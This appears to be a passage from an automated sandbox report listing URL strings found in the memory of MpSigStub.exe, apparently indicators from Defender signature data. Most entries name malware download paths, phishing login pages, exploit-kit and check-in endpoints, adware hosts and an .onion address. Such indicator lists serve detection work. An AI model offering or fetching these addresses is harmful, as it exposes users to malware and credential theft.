Source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp String found in binary or memory: http://download.softobase.com/ru/xL
Source: MpSigStub.exe, 00000024.00000003.6292407063.00000197A4EC4000.00000004.00000001.sdmp String found in binary or memory: http://download.spy-shredder.com/ssdownload.php?&advid=00001322&u=%u&p=%u&lang=________&vs=%u&%s
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp String found in binary or memory: http://download.websearch.com/Dnl/T_
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp String found in binary or memory: http://download.websearch.com/Tb
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp String found in binary or memory: http://download.websearch.com/dnl/T
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://download.zhongsou.com/cdsearch/
Source: MpSigStub.exe, 00000024.00000003.6285606128.00000197A309B000.00000004.00000001.sdmp String found in binary or memory: http://download.zhongsou.com/msstat/dealip.asp?aa=%s&bb=%s&cc=%s&dd=%s&ee=%d&ff=%ld&gg=%
Source: MpSigStub.exe, 00000024.00000003.6312336240.00000197A3E16000.00000004.00000001.sdmp String found in binary or memory: http://download.zhongsou.com/routeway/dealsetup.asp?aa=%s&bb=%s&cc=%s&dd=%s
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp String found in binary or memory: http://download.zjsyawqj.cn/jjbq/setup_jjbq_jjbq03nodkpk_v1.0_silent.exe
Source: MpSigStub.exe, 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp String found in binary or memory: http://download1.ihyip.pw/
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: http://download2.mybrowserbar.com/kits/hlp/exthelper.exe
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp String found in binary or memory: http://downloadfile.xyz/mine/run.js
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp String found in binary or memory: http://downloadfilesldr.com/allfile.jpg
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp String found in binary or memory: http://downloadfilesldr.com/index2.php?adv=141
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp String found in binary or memory: http://downloadfilesldr.com/index3.php?adv=141
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp String found in binary or memory: http://downloadfilesldr.com/index4.php?adv=141
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp String found in binary or memory: http://downloadfilesldr.com/index5.php?adv=141
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://downloads-full.com.br/
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: http://downloads.180solutions.com/
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://downtown.crstycricri.net/pc/page/set_reg.php?af_code=&cuid=
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp String found in binary or memory: http://downza.cn
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://dqbdesign.com/wp-admin/cu_sa/
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp String found in binary or memory: http://drm.ysbweb.com/v1.aspx?id=65181__asf_license_url_ends_here__
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp String found in binary or memory: http://dropboxservices.isaihost.com/dropbox/drop/dropbox.html)
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://drpuneetchawla.com/cli/adbe/login.html
Source: MpSigStub.exe, 00000024.00000003.6316460209.00000197A40AB000.00000004.00000001.sdmp String found in binary or memory: http://dtrack.secdls.com
Source: MpSigStub.exe, 00000024.00000003.6347934302.00000197A4E28000.00000004.00000001.sdmp String found in binary or memory: http://dudethisishowwedoitallnightlong.2myip.net
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://duhjhv.ftp1.biz/ip/stat.php
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp String found in binary or memory: http://dvd2ipad.net/media2
Source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp String found in binary or memory: http://dw.mtsou.com/
Source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp String found in binary or memory: http://dw.mtsou.com/_
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://dwaplord2018.tk/doc/purchaseorder.doc
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: http://dx.mastacash.com
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp String found in binary or memory: http://dxcodec.com/uninstall/
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp String found in binary or memory: http://dz-site.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp String found in binary or memory: http://e223pg.awardspace.co.uk/up.php
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://eastman.smritiphotography.in/#ywhvzgdlc0blyxn0bwfulmnvbq==
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://ebsuggester.com/redirect-new-logon-alert/redirect.htm
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp String found in binary or memory: http://economycrown.com/hahdhdhd/sf-express.php?email=
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp String found in binary or memory: http://eda.ru/data
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://eduardovolpi.com.br/flipbook/postal/services/parcel)
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://educadorfisicoadinis.com.br/ryan/login%20pdf.html)/type/action/s/uri
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://efficientlifechurch.com/.well-known/pki-validation/msg.jpg
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://egomam.ru/neworder.doc
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: http://eleonorepack.cn/myexp/getexe.php?spl=javadmjava/io/bufferedoutputstreamjava/io/fileoutputstre
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://elpctchair00.net/pc/page/set_reg.php?code=&cuid=
Source: MpSigStub.exe, 00000024.00000003.6311649432.00000197A38AA000.00000004.00000001.sdmp String found in binary or memory: http://elsword.com/xb
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp String found in binary or memory: http://employeeportal.net-login.com/
Source: MpSigStub.exe, 00000024.00000003.6343232049.00000197A3FA3000.00000004.00000001.sdmp String found in binary or memory: http://en.aa.com
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp String found in binary or memory: http://en.eazel.com/
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp String found in binary or memory: http://en.v9.com/
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: http://en.v9.com/?utm_source=b&utm_medium=
Source: MpSigStub.exe, 00000024.00000003.6306777580.00000197A39F4000.00000004.00000001.sdmp String found in binary or memory: http://endresactuarial.com/
Source: MpSigStub.exe, 00000024.00000003.6325389459.00000197A496F000.00000004.00000001.sdmp String found in binary or memory: http://engine.dmccint.com/common/ProcessDump.exe?v=1.0.3.0x
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://enomioms.club/msw/
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp String found in binary or memory: http://erasoltours.com/logs/hixfibqw.php
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://erlivia.ltd
Source: MpSigStub.exe, 00000024.00000003.6307248389.00000197A3A78000.00000004.00000001.sdmp String found in binary or memory: http://ermi.co.zw/ds/2312.gif
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp String found in binary or memory: http://errors.crossrider.com/utility.gif
Source: MpSigStub.exe, 00000024.00000003.6329696621.00000197A4DE7000.00000004.00000001.sdmp String found in binary or memory: http://errors.statsmyapp.com
Source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp String found in binary or memory: http://errors.statsmyapp.com/installer-error.gif?action=wrapper
Source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp String found in binary or memory: http://errors.statsmyapp.com/installer-error.gif?action=wrapperxk
Source: MpSigStub.exe, 00000024.00000003.6329696621.00000197A4DE7000.00000004.00000001.sdmp String found in binary or memory: http://errors.statsmyapp.comxa
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://escritorioharpia.com/wp-content/upgrade/resume.php?id=
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: http://esiglass.it/glassclass/glass.php
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp String found in binary or memory: http://esmxc01.top/download.php?file=lv.exe
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp String found in binary or memory: http://esp1k.myddns.me/
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp String found in binary or memory: http://estelaraziel.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp String found in binary or memory: http://etzhb.000webhostapp.com/read.txt
Source: MpSigStub.exe, 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp String found in binary or memory: http://eula.mindspark.com
Source: MpSigStub.exe, 00000024.00000003.6300197684.00000197A42BB000.00000004.00000001.sdmp String found in binary or memory: http://eula.mindspark.com/eula/
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp String found in binary or memory: http://events.bittorrent.com/startConversion
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp String found in binary or memory: http://everbot.pl/cs/reg.php?id=
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: http://ewd96h2.sed.macabrepoe.com
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: http://excelvba.ru/updates/download.php?addin=Parser
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp String found in binary or memory: http://exe-1.icu/install2.exe
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: http://expandingdelegation.top/
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp String found in binary or memory: http://experimental.sitesled.com/wind.jpg
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp String found in binary or memory: http://explorehere.in/info/new-invoice-
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://f0568929.xsph.ru/po/rexifly.php?
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp String found in binary or memory: http://f0570495.xsph.ru/files/pdf.php
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp String found in binary or memory: http://f1visa.info/cd/cd.php?id=%s&ver=g
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: http://faacebookv.tk/reveal.php
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp String found in binary or memory: http://facebegen.com/dexport/ajax.php
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp String found in binary or memory: http://faisdodo.info/sbuild1.exe
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp String found in binary or memory: http://faneuil-lawsuit.com/xl.png
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp String found in binary or memory: http://fantastico.globo.com/jornalismo/fant/
Source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp String found in binary or memory: http://fast-loads2.name/agreement.php
Source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp String found in binary or memory: http://fast-loads2.name/agreement.phpxN
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: http://fateh.aba.ae/abc.zip
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: http://fateh.aba.ae/xyzx.zip
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp String found in binary or memory: http://fbcores.info/
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://fechiizonshiteita-taihendayo.net/movie.php?id=movies_n01.wmv&cid=
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://fechiizonshiteita-taihendayo.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp String found in binary or memory: http://feed.helperbar.com
Source: MpSigStub.exe, 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp String found in binary or memory: http://fei-coder.com/
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp String found in binary or memory: http://feliz2008.land.ru/iexplore.exe
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://fellatioadultfilehost.com/pc/page/set_reg.php?af_num=&cuid=
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp String found in binary or memory: http://fen0men.info/exp/index.php
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp String found in binary or memory: http://festival23234.com/flash.php?mode=1
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://fgrss.com/?referrer=c3rob3jhdeblyxn0bwfulmnvbq==
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp String found in binary or memory: http://fhayazilim.com/wp-admin/
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp String found in binary or memory: http://fibrassolpiscinas.com.br/wp-content/upgrabe/
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp String found in binary or memory: http://file.sidetab.co.kr/dst/WallTab_
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp String found in binary or memory: http://files.getpricefinder.com/install/ie/pricefinderpackage.zip
Source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp String found in binary or memory: http://finance.yahoo.com/
Source: MpSigStub.exe, 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp String found in binary or memory: http://finanzen-netto.de
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://find.verycd.com/folders?cat=movie&kw=%s
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: http://finder.strangled.net/?pubid=
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://fineartconsult.be/gallery/index.php?email=
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://firefoxstabs.com/
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp String found in binary or memory: http://firestweb.com/loja/social/1.jpg
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp String found in binary or memory: http://firestweb.com/loja/social/2.jpg
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp String found in binary or memory: http://firestweb.com/loja/social/3.jpg
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp String found in binary or memory: http://fixdoctorsfirst.net/registry/andyfkz.png?bg=sp14
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp String found in binary or memory: http://flash.chinaren.com/ip/ip.php
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp String found in binary or memory: http://flashupd.com/mp3/in
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp String found in binary or memory: http://flow4.6299.cc/ClientAPI/flowtaskAPI.aspx
Source: MpSigStub.exe, 00000024.00000003.6274632476.00000197A2E92000.00000004.00000001.sdmp String found in binary or memory: http://fmforums.com/wggx991264/
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://foo.w97.cn/SoftInterFace/SearchNum.aspx
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://foo.w97.cn/data/file/kwbuf.ini
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp String found in binary or memory: http://forms.newlifeadmin.org
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp String found in binary or memory: http://fortisdesigns.com/5ox6oyzzslcp
Source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp String found in binary or memory: http://foundation.shanto-mariamfoundation.org/24.gif
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://foxxpriv.ru/pic1/index.php
Source: MpSigStub.exe, 00000024.00000003.6273173989.00000197A4452000.00000004.00000001.sdmp String found in binary or memory: http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp String found in binary or memory: http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=10
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp String found in binary or memory: http://frame.crazywinnings.com/scripts/protect.php?promo
Source: MpSigStub.exe, 00000024.00000003.6355237590.00000197A3E9A000.00000004.00000001.sdmp String found in binary or memory: http://freeimagehost.ru/ubanner.png
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: http://freeunweb.pro/FreeUnWeb.exe
Source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp String found in binary or memory: http://freevideoz.info/
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://freight.eu.com/download
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://fu.o3sb.com:9999/img.jpg
Source: MpSigStub.exe, 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp String found in binary or memory: http://funsiteshere.com/
Source: MpSigStub.exe, 00000024.00000003.6325389459.00000197A496F000.00000004.00000001.sdmp String found in binary or memory: http://funsiteshere.com/redir.php
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp String found in binary or memory: http://futebolclubesantacruz.com.br/
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://futureweighed.ae.am/showthread.php?t=731756
Source: MpSigStub.exe, 00000024.00000003.6344719591.00000197A3659000.00000004.00000001.sdmp String found in binary or memory: http://g.delyemo.ru
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: http://g1.globo.com/Noticias/SaoPaulo/0
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://gahtt9j6.u8f3e5jq.ru
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://gaigoixxx.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp String found in binary or memory: http://galinasergeeva.ru
Source: MpSigStub.exe, 00000024.00000003.6344346071.00000197A30DC000.00000004.00000001.sdmp String found in binary or memory: http://galleries.payserve.com/1/31952/1
Source: MpSigStub.exe, 00000024.00000003.6327011523.00000197A3767000.00000004.00000001.sdmp String found in binary or memory: http://gallerydating.net
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://gallolitaadultmove.com/pc/page/set_reg.php?code=&cuid=
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://gameroominc.com/
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://games.enet.com.cn/article/SearchCategory.php?key=%s
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://garlic10.grey.ero0101.com/set_inf.php?id=ero257.wmv&cid=
Source: MpSigStub.exe, 00000024.00000003.6321480698.00000197A3B3E000.00000004.00000001.sdmp String found in binary or memory: http://gathome.com/cgi-bin/first.pl
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://gdcbmuveqjsli57x.onion/b93cf40ee63ed066
Source: MpSigStub.exe, 00000024.00000003.6311649432.00000197A38AA000.00000004.00000001.sdmp String found in binary or memory: http://ge.tt/api/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://geezybeatz.com/secured/index.html)
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://geocities.com/jobreee/main.htm
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp String found in binary or memory: http://get.file136desktop.info/DownloadManager/Get?p=638x
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp String found in binary or memory: http://getfreez.net/multi-codec-pack.php
Source: MpSigStub.exe, 00000024.00000003.6286203133.00000197A3ABB000.00000004.00000001.sdmp String found in binary or memory: http://getmethere.ws
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp String found in binary or memory: http://getp.jujutang.com
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp String found in binary or memory: http://getsuperstuff.com
Source: MpSigStub.exe, 00000024.00000003.6285606128.00000197A309B000.00000004.00000001.sdmp String found in binary or memory: http://getsyncer5.info/sync/?ext=bcool&pid=26&country=us
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: http://getvolkerdns.co.cc/priv8
Source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: http://getwebcake.com/Privacy
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: http://getyouneed.co
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: http://getyouneed.coa
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp String found in binary or memory: http://getyouneed.com
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: http://getyouneed.com/r.php?wm=5
Source: MpSigStub.exe, 00000024.00000003.6347934302.00000197A4E28000.00000004.00000001.sdmp String found in binary or memory: http://gg.pw
Source: MpSigStub.exe, 00000024.00000003.6290223213.00000197A39E2000.00000004.00000001.sdmp String found in binary or memory: http://ghsinternationalconferencewithinternationalfilesecureserviceglo.ydns.eu
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://ghthf.cf/cert/
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp String found in binary or memory: http://gicia.info/cd/cd.php?id=%s&ver=g
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: http://gidstaxi.nl/mrszheuhe/8888888.png
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://ginger90.ivory.ero0101.com/set_inf.php?id=ero257.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://girlongirllibido.info/show.php?s=c366aa9358
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://gistsdey.com/wp-content/
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: http://globalsoftbd.com/votre_agence-lcl.php
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: http://globonoticia.iitalia.com/noticia.com
Source: MpSigStub.exe, 00000024.00000003.6325389459.00000197A496F000.00000004.00000001.sdmp String found in binary or memory: http://go.58.com/?f=
Source: MpSigStub.exe, 00000024.00000003.6347934302.00000197A4E28000.00000004.00000001.sdmp String found in binary or memory: http://go.jetswap.com/ssflang.php?it=4893473
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp String found in binary or memory: http://go.secureclick6.com/0534
Source: MpSigStub.exe, 00000024.00000003.6275006647.0000019790C75000.00000004.00000001.sdmp String found in binary or memory: http://go.winantivirus.com
Source: MpSigStub.exe, 00000024.00000003.6275006647.0000019790C75000.00000004.00000001.sdmp String found in binary or memory: http://go.winantivirus.comx
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp String found in binary or memory: http://goatse.ragingfist.net/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://gogglgdoc.com/document/review/index.html)
Source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp String found in binary or memory: http://gogo.ru/go?x;
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp String found in binary or memory: http://golden-toto.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp String found in binary or memory: http://goo.gl/
Source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp String found in binary or memory: http://goo.gl/0ma6okopenhttp://goo.gl/0ma6okerror
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp String found in binary or memory: http://goo.gl/9mrcts
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://goo.gl/bw14po
Source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp String found in binary or memory: http://goo.gl/x7a4lcshowwebinpopuptaskkill-f-im
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp String found in binary or memory: http://google.com
